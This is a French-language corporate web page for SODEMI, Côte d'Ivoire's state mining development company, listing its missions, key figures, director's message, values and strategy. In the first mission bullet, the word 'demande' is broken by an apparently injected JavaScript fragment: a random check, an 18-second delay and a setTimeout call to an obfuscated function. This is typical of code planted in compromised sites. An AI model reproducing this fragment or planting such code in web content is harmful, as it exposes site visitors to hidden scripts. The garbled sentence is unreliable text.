SODEMI

SOciété pour le DÉveloppement MInier de la Côte d’Ivoire (SODEMI), est une société d’Etat créée par la loi n° 62-82 du 22/03/1962 avec un capital initial de 65 Millions  FCFA. Le capital actuel est de 600 Millions  FCFA.

Ces missions sont :

  • Exécuter les programmes de recherches géologiques et minérales établis à la demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande du Gouvernement, participer à la mise en valeur des découvertes et à l’exploitation des gisements.
  • Exécuter d’autres travaux de sa compétence qui pourraient lui être confiés par les tiers publics ou privés nationaux ou étrangers.
  • Exercer tous droits d’intervention et de cession de droit minier, afférents aux résultats de ses recherches sous réserve des dispositions du Code Minier.
  • Commercialiser tous produits de toute entreprise minière à laquelle elle participerait en quelque qualité que ce soit, et créer toute filiale nécessaire, sous quelque forme juridique que ce soit, aux fins de cette commercialisation.

CHIFFRES CLES

Expériences - +50 ans
Géologie depuis 1965
Des partenaires nationaux et internationaux de renommée plus de 35 ans
Technologie de pointe, et expert

La SODEMI, La porte d'entrée du Secteur Minier Ivoirien

MOT DU DIRECTEUR

SODEMI en tant qu’acteur important du secteur minier et bras technique de l’Etat de Côte d’Ivoire dans l’activité minière entend jouer son rôle d’appui dans la politique minière du gouvernement. SODEMI se pose en tant que le partenaire de choix pour les différentes compagnies minières qui veulent explorer le sous-sol minier en Côte d’Ivoire.

KONE Moussa Séydou

Directeur Général
0
Ingénieurs spécialistes
0
Clients
0
Projets

NOS VALEURS

Professionnalisme

Le professionnalisme est la base de notre démi-siècle d’expérience.

Esprit d'équipe

Le travail en équipe est un sacrément chez nous.

Responsabilité

Conscient que nous représentons la politique de l’Etat dans le secteur minier, nous prenons celà au sérieux.

SODEMI EN PHOTOS

VISION ET STRATEGIE

  • S’affirmer comme locomotive d’un secteur minier, contributeur majeur de l’économie d’une Côte d’Ivoire émergente à l’horizon des années 2020. Maintenir l’expertise de SODEMI  à un niveau qui fait d’elle une référence régionale dans la maitrise des métiers,  le respect des normes de qualité, sécurité, protection de l’environnement et la responsabilité sociale dans le secteur de l’industrie minière.
  • Intensifier les activités de recherche et d’exploration dans le but de découvrir de nouveaux gisements capables d’attirer plus d’opérateurs miniers en Côte d’Ivoire.
  • Diversifier l’offre de services dans l’accompagnement des sociétés qui recherchent des solutions spécifiques dans leurs activités.
  • Développer de nouveaux services d’appuis aux politiques publiques du secteur des mines.
  • Initier des projets structurants dans la chaîne des valeurs de l’industrie minérale.

NOS PARTENAIRES